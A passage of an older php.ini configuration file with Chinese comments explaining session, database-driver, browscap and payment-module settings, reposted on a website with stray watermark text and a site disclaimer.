bcmath.scale = 0 ; 用于所有bcmath函數的10十進制數數字的個數number of decimal digits for all bcmath functions　 [browscap]　 ;browscap = extra/browscap.ini　 browscap = C:\WIN\SYSTEM\inetsrv\browscap.ini　 [Informix]　 ifx.default_host = ; ifx_connect() 默認使用的主機（安全模式下無效）　 ifx.default_user = ; ifx_connect() 默認使用的用戶名（安全模式下無效）　 ifx.default_password = ; ifx_connect() 默認使用的密碼（安全模式下無效）　 ifx.allow_persistent = On ; 允許或禁止 持久連接　 ifx.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 ifx.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 ifx.textasvarchar = 0 ; 若打開，select 狀態符返回一個 『text blob』字段的內容，而不是它的id　 ifx.byteasvarchar = 0 ; 若打開，select 狀態符返回一個 『byte blob』字段的內容，而不是它的id　 ifx.charasvarchar = 0 ; 追蹤從固定長度的字符列裏剝離的空格.　 ; 可能對 Informix SE 用戶有效.　 ifx.blobinfile = 0 ; 若打開，text和byte blobs 的內容被導出到一個文件　 ; 而不是保存到內存.　 ifx.nullformat = 0 ; NULL（空）被作爲空字段返回，除非，這裏被設爲1.　 ; 這種情況下（爲1），NULL作爲字串NULL返回.　 [Session]　 session.save_handler = files ; 用于保存/取回數據的控制方式　 session.save_path = C:\win\temp ; 在 save_handler 設爲文件時傳給控制器的參數，　 ; 這是數據文件將保存的路徑.　 session.use_cookies = 1 ; 是否使用cookies　 session.name = PHPSESSID　 ; 用在cookie裏的session的名字　 session.auto_start = 0 ; 在請求啓動時初始化session　 session.cookie_lifetime = 0 ; 爲按秒記的cookie的保存時間，　 ; 或爲0時，直到浏覽器被重啓　 session.cookie_path = / ; cookie的有效路徑　 session.cookie_domain = ; cookie的有效域　 session.serialize_handler = php ; 用于連接數據的控制器　 ; php是 PHP 的標准控制器.　 session.gc_probability = 1 ; 按百分比的'garbage collection（碎片整理）'進程　 ; 在每次 session 初始化的時候開始的可能性.　 網管bitscn_com session.gc_maxlifetime = 1440 ; 在這裏數字所指的秒數後，保存的數據將被視爲　 ; '碎片(garbage)'並由gc 進程清理掉.　 session.referer_check = ; 檢查 HTTP引用以使額外包含于URLs中的ids無效　 session.entropy_length = 0 ; 從文件中讀取多少字節　 session.entropy_file = ; 指定這裏建立 session id　 ; session.entropy_length = 16　 ; session.entropy_file = /dev/urandom　 session.cache_limiter = nocache ; 設爲{nocache,private,public},以決定 HTTP 的　 ; 緩存問題　 session.cache_expire = 180 ; 文檔在 n 分鍾後過時　 session.use_trans_sid = 1 ; 使用過渡性的 sid 支持，若編譯時許可了　 ; --enable-trans-sid　 url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=fakeentry"　 [MSSQL]　 ;extension=php_mssql.dll　 mssql.allow_persistent = On ; 允許或禁止 持久連接　 mssql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 mssql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 網管u家u.bitsCN.com mssql.min_error_severity = 10 ; 顯示的錯誤的最低嚴重性　 mssql.min_message_severity = 10 ; 顯示的消息的最低重要性　 mssql.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.　 [Assertion]　 ; ？？？？？　 ;assert.active = On ; ？assert(expr); active by default　 ;assert.warning = On ; issue a PHP warning for each failed assertion.　 ;assert.bail = Off ; don't bail out by default.　 ;assert.callback = 0 ; user-function to be called if an assertion fails.　 ;assert.quiet_eval = 0 ; eval the expression with current error_reporting(). set to true if you want error_reporting(0) around the eval().　 [Ingres II]　 ii.allow_persistent = On ; 允許或禁止 持久連接　 ii.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 ii.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 ii.default_database = ; 默認 database (format : [node_id::]dbname[/srv_class]　 ii.default_user = ; 默認 user　 ii.default_password = ; 默認 password　 網管下載dl.bitscn.com [Verisign Payflow Pro]　 pfpro.defaulthost = "test.signio.com" ; 默認的 Signio 服務器　 pfpro.defaultport = 443 ; 連接的默認端口　 pfpro.defaulttimeout = 30 ; 按秒計的默認超時時間　 ; pfpro.proxyaddress = ; 默認的代理的 IP 地址（如果需要）　 ; pfpro.proxyport = ; 默認的代理的端口　 ; pfpro.proxylogon = ; 默認的代理的登錄（logon 用戶名）　 ; pfpro.proxypassword = ; 默認的代理的密碼　 [Sockets]　 sockets.use_system_read = On ; 使用系統的read() 函數替代 php_read()封裝　 ; Local Variables: （局部變量）　 ; tab-width: 4　 ; End:

 

 

 

　　免責聲明：本文僅代表作者個人觀點，與王朝網路無關。王朝網路登載此文出於傳遞更多信息之目的，並不意味著贊同其觀點或證實其描述，其原創性以及文中陳述文字和內容未經本站證實，對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾，請讀者僅作參考，並請自行核實相關內容。